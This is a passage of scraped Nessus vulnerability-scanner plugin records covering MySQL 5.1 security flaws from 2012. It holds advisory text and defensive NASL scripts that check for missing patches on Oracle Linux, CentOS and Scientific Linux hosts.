- Protocol\n - Server Optimizer\n - Server Replication", "modified": "2019-12-02T00:00:00", "id": "MYSQL_5_1_65.NASL", "href": "https://www.tenable.com/plugins/nessus/62638", "published": "2012-10-19T00:00:00", "title": "MySQL 5.1 < 5.1.65 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62638);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/15 20:50:21\");\n\n script_cve_id(\n \"CVE-2012-3150\",\n \"CVE-2012-3158\",\n \"CVE-2012-3163\",\n \"CVE-2012-3197\"\n );\n script_bugtraq_id(55990, 56017, 56036, 56021);\n \n script_name(english:\"MySQL 5.1 < 5.1.65 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of MySQL server\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote database server is affected by multiple vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of MySQL 5.1 installed on the remote host is earlier than\n5.1.65 and is, therefore, affected by vulnerabilities in the following\ncomponents :\n\n - Information Schema\n - Protocol\n - Server Optimizer\n - Server Replication\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://dev.mysql.com/doc/refman/5.1/en/news-5-1-65.html\");\n # https://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?87547c81\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to MySQL version 5.1.65 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/10/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/10/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mysql:mysql\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Databases\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_version.nasl\", \"mysql_login.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/mysql\", 3306);\n\n exit(0);\n}\n\ninclude(\"mysql_version.inc\");\n\nmysql_check_version(fixed:'5.1.65', min:'5.1', severity:SECURITY_HOLE);\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T08:41:13", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2012:1462 :\n\nUpdated mysql packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists\nof the MySQL server daemon (mysqld) and many client programs and\nlibraries.\n\nThis update fixes several vulnerabilities in the MySQL database\nserver. Information about these flaws can be found on the Oracle\nCritical Patch Update Advisory pages, listed in the References\nsection. (CVE-2012-1688, CVE-2012-1690, CVE-2012-1703, CVE-2012-2749,\nCVE-2012-0540, CVE-2012-1689, CVE-2012-1734, CVE-2012-3163,\nCVE-2012-3158, CVE-2012-3177, CVE-2012-3166, CVE-2012-3173,\nCVE-2012-3150, CVE-2012-3180, CVE-2012-3167, CVE-2012-3197,\nCVE-2012-3160)\n\nThese updated packages upgrade MySQL to version 5.1.66. Refer to the\nMySQL release notes listed in the References section for a full list\nof changes.\n\nAll MySQL users should upgrade to these updated packages, which\ncorrect these issues. After installing this update, the MySQL server\ndaemon (mysqld) will be restarted automatically.", "modified": "2019-12-02T00:00:00", "id": "ORACLELINUX_ELSA-2012-1462.NASL", "href": "https://www.tenable.com/plugins/nessus/68658", "published": "2013-07-12T00:00:00", "title": "Oracle Linux 6 : mysql (ELSA-2012-1462)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:1462 and \n# Oracle Linux Security Advisory ELSA-2012-1462 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68658);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/09/30 10:58:17\");\n\n script_cve_id(\"CVE-2012-0540\", \"CVE-2012-1688\", \"CVE-2012-1689\", \"CVE-2012-1690\", \"CVE-2012-1703\", \"CVE-2012-1734\", \"CVE-2012-2749\", \"CVE-2012-3150\", \"CVE-2012-3158\", \"CVE-2012-3160\", \"CVE-2012-3163\", \"CVE-2012-3166\", \"CVE-2012-3167\", \"CVE-2012-3173\", \"CVE-2012-3177\", \"CVE-2012-3180\", \"CVE-2012-3197\");\n script_bugtraq_id(53058, 53067, 53074, 54540, 54547, 54551, 55120, 55990, 56003, 56005, 56017, 56018, 56021, 56027, 56028, 56036, 56041);\n script_xref(name:\"RHSA\", value:\"2012:1462\");\n\n script_name(english:\"Oracle Linux 6 : mysql (ELSA-2012-1462)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:1462 :\n\nUpdated mysql packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists\nof the MySQL server daemon (mysqld) and many client programs and\nlibraries.\n\nThis update fixes several vulnerabilities in the MySQL database\nserver. Information about these flaws can be found on the Oracle\nCritical Patch Update Advisory pages, listed in the References\nsection. (CVE-2012-1688, CVE-2012-1690, CVE-2012-1703, CVE-2012-2749,\nCVE-2012-0540, CVE-2012-1689, CVE-2012-1734, CVE-2012-3163,\nCVE-2012-3158, CVE-2012-3177, CVE-2012-3166, CVE-2012-3173,\nCVE-2012-3150, CVE-2012-3180, CVE-2012-3167, CVE-2012-3197,\nCVE-2012-3160)\n\nThese updated packages upgrade MySQL to version 5.1.66. Refer to the\nMySQL release notes listed in the References section for a full list\nof changes.\n\nAll MySQL users should upgrade to these updated packages, which\ncorrect these issues. After installing this update, the MySQL server\ndaemon (mysqld) will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-November/003138.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mysql packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-embedded-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-test\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/11/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"mysql-5.1.66-1.el6_3\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-bench-5.1.66-1.el6_3\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-devel-5.1.66-1.el6_3\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-embedded-5.1.66-1.el6_3\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-embedded-devel-5.1.66-1.el6_3\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-libs-5.1.66-1.el6_3\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-server-5.1.66-1.el6_3\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-test-5.1.66-1.el6_3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mysql / mysql-bench / mysql-devel / mysql-embedded / etc\");\n}\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T08:09:48", "bulletinFamily": "scanner", "description": "The version of MySQL 5.1 installed on the remote host is earlier than\n5.1.64 and is, therefore, affected by vulnerabilities in the following\ncomponents :\n\n - InnoDB\n - InnoDB Plugin\n - Server Full Text Search", "modified": "2019-12-02T00:00:00", "id": "MYSQL_5_1_64.NASL", "href": "https://www.tenable.com/plugins/nessus/62637", "published": "2012-10-19T00:00:00", "title": "MySQL 5.1 < 5.1.64 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62637);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/15 20:50:21\");\n\n script_cve_id(\"CVE-2012-3166\", \"CVE-2012-3167\", \"CVE-2012-3173\");\n script_bugtraq_id(56018, 56028, 56041);\n \n script_name(english:\"MySQL 5.1 < 5.1.64 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of MySQL server\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote database server is affected by multiple vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of MySQL 5.1 installed on the remote host is earlier than\n5.1.64 and is, therefore, affected by vulnerabilities in the following\ncomponents :\n\n - InnoDB\n - InnoDB Plugin\n - Server Full Text Search\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://dev.mysql.com/doc/refman/5.1/en/news-5-1-64.html\");\n # https://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?87547c81\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to MySQL version 5.1.64 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/10/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/10/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mysql:mysql\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Databases\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_version.nasl\", \"mysql_login.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/mysql\", 3306);\n\n exit(0);\n}\n\ninclude(\"mysql_version.inc\");\n\nmysql_check_version(fixed:'5.1.64', min:'5.1', severity:SECURITY_WARNING);\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2019-12-13T06:41:13", "bulletinFamily": "scanner", "description": "Updated mysql packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists\nof the MySQL server daemon (mysqld) and many client programs and\nlibraries.\n\nThis update fixes several vulnerabilities in the MySQL database\nserver. Information about these flaws can be found on the Oracle\nCritical Patch Update Advisory pages, listed in the References\nsection. (CVE-2012-1688, CVE-2012-1690, CVE-2012-1703, CVE-2012-2749,\nCVE-2012-0540, CVE-2012-1689, CVE-2012-1734, CVE-2012-3163,\nCVE-2012-3158, CVE-2012-3177, CVE-2012-3166, CVE-2012-3173,\nCVE-2012-3150, CVE-2012-3180, CVE-2012-3167, CVE-2012-3197,\nCVE-2012-3160)\n\nThese updated packages upgrade MySQL to version 5.1.66. Refer to the\nMySQL release notes listed in the References section for a full list\nof changes.\n\nAll MySQL users should upgrade to these updated packages, which\ncorrect these issues. After installing this update, the MySQL server\ndaemon (mysqld) will be restarted automatically.", "modified": "2019-12-02T00:00:00", "id": "CENTOS_RHSA-2012-1462.NASL", "href": "https://www.tenable.com/plugins/nessus/62921", "published": "2012-11-15T00:00:00", "title": "CentOS 6 : mysql (CESA-2012:1462)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:1462 and \n# CentOS Errata and Security Advisory 2012:1462 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62921);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/10/02 15:30:18\");\n\n script_cve_id(\"CVE-2012-0540\", \"CVE-2012-1688\", \"CVE-2012-1689\", \"CVE-2012-1690\", \"CVE-2012-1703\", \"CVE-2012-1734\", \"CVE-2012-2749\", \"CVE-2012-3150\", \"CVE-2012-3158\", \"CVE-2012-3160\", \"CVE-2012-3163\", \"CVE-2012-3166\", \"CVE-2012-3167\", \"CVE-2012-3173\", \"CVE-2012-3177\", \"CVE-2012-3180\", \"CVE-2012-3197\");\n script_bugtraq_id(53058, 53067, 53074, 54540, 54547, 54551, 55120, 55990, 56003, 56005, 56017, 56018, 56021, 56027, 56028, 56036, 56041);\n script_xref(name:\"RHSA\", value:\"2012:1462\");\n\n script_name(english:\"CentOS 6 : mysql (CESA-2012:1462)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated mysql packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists\nof the MySQL server daemon (mysqld) and many client programs and\nlibraries.\n\nThis update fixes several vulnerabilities in the MySQL database\nserver. Information about these flaws can be found on the Oracle\nCritical Patch Update Advisory pages, listed in the References\nsection. (CVE-2012-1688, CVE-2012-1690, CVE-2012-1703, CVE-2012-2749,\nCVE-2012-0540, CVE-2012-1689, CVE-2012-1734, CVE-2012-3163,\nCVE-2012-3158, CVE-2012-3177, CVE-2012-3166, CVE-2012-3173,\nCVE-2012-3150, CVE-2012-3180, CVE-2012-3167, CVE-2012-3197,\nCVE-2012-3160)\n\nThese updated packages upgrade MySQL to version 5.1.66. Refer to the\nMySQL release notes listed in the References section for a full list\nof changes.\n\nAll MySQL users should upgrade to these updated packages, which\ncorrect these issues. After installing this update, the MySQL server\ndaemon (mysqld) will be restarted automatically.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-November/018995.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6a199ab9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mysql packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mysql-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mysql-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mysql-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mysql-embedded-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mysql-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mysql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mysql-test\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/11/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"mysql-5.1.66-1.el6_3\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"mysql-bench-5.1.66-1.el6_3\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"mysql-devel-5.1.66-1.el6_3\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"mysql-embedded-5.1.66-1.el6_3\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"mysql-embedded-devel-5.1.66-1.el6_3\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"mysql-libs-5.1.66-1.el6_3\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"mysql-server-5.1.66-1.el6_3\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"mysql-test-5.1.66-1.el6_3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mysql / mysql-bench / mysql-devel / mysql-embedded / etc\");\n}\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:13:15", "bulletinFamily": "scanner", "description": "This update fixes several vulnerabilities in the MySQL database\nserver. Information about these flaws can be found on the Oracle\nCritical Patch Update Advisory pages. (CVE-2012-1688, CVE-2012-1690,\nCVE-2012-1703, CVE-2012-2749, CVE-2012-0540, CVE-2012-1689,\nCVE-2012-1734, CVE-2012-3163, CVE-2012-3158, CVE-2012-3177,\nCVE-2012-3166, CVE-2012-3173, CVE-2012-3150, CVE-2012-3180,\nCVE-2012-3167, CVE-2012-3197, CVE-2012-3160)\n\nThese updated packages upgrade MySQL to version 5.1.66. Refer to the\nMySQL release notes for a full list of changes.\n\nAfter installing this update, the MySQL server daemon (mysqld) will be\nrestarted automatically.", "modified": "2019-12-02T00:00:00", "id": "SL_20121114_MYSQL_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/62934", "published": "2012-11-16T00:00:00", "title": "Scientific Linux Security Update : mysql on SL6.x i386/x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62934);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/07/11 12:05:37\");\n\n script_cve_id(\"CVE-2012-0540\", \"CVE-2012-1688\", \"CVE-2012-1689\", \"CVE-2012-1690\", \"CVE-2012-1703\", \"CVE-2012-1734\", \"CVE-2012-2749\", \"CVE-2012-3150\", \"CVE-2012-3158\", \"CVE-2012-3160\", \"CVE-2012-3163\", \"CVE-2012-3166\", \"CVE-2012-3167\", \"CVE-2012-3173\", \"CVE-2012-3177\", \"CVE-2012-3180\", \"CVE-2012-3197\");\n\n script_name(english:\"Scientific Linux Security Update : mysql on SL6.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes several vulnerabilities in the MySQL database\nserver. Information about these flaws can be found on the Oracle\nCritical Patch Update Advisory pages. (CVE-2012-1688, CVE-2012-1690,\nCVE-2012-1703, CVE-2012-2749, CVE-2012-0540, CVE-2012-1689,\nCVE-2012-1734, CVE-2012-3163, CVE-2012-3158, CVE-2012-3177,\nCVE-2012-3166, CVE-2012-3173, CVE-2012-3150, CVE-2012-3180,\nCVE-2012-3167, CVE-2012-3197, CVE-2012-3160)\n\nThese updated packages upgrade MySQL to version 5.1.66. Refer to the\nMySQL release notes for a full list of changes.\n\nAfter installing this update, the MySQL server daemon (mysqld) will be\nrestarted automatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1211&L=scientific-linux-errata&T=0&P=1447\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b731225b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/11/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"mysql-5.1.66-1.el6_3\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"mysql-bench-5.1.66-1.el6_3\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"mysql-devel-5.1.66-1.el6_3\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"mysql-embedded-5.1.66-1.el6_3\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"mysql-embedded-devel-5.1.66-1.el6_3\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"mysql-libs-5.1.66-1.el6_3\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"mysql-server-5.1.66-1.el6_3\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"mysql-test-5.1.66-1.el6_3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:44:48", "bulletinFamily": "scanner", "description": "Multiple security issues were discovered in MySQL and this update\nincludes new upstream MySQL versions to fix these issues.\n\nMySQL has been updated to 5.1.66 in Ubuntu 10.04 LTS and Ubuntu 11.10.\nUbuntu 12.04 LTS and Ubuntu 12.10 have been updated to MySQL 5.5.28.\n\nIn addition to security fixes, the updated packages contain bug fixes,\nnew features, and possibly incompatible changes.\n\nPlease see the following for more information 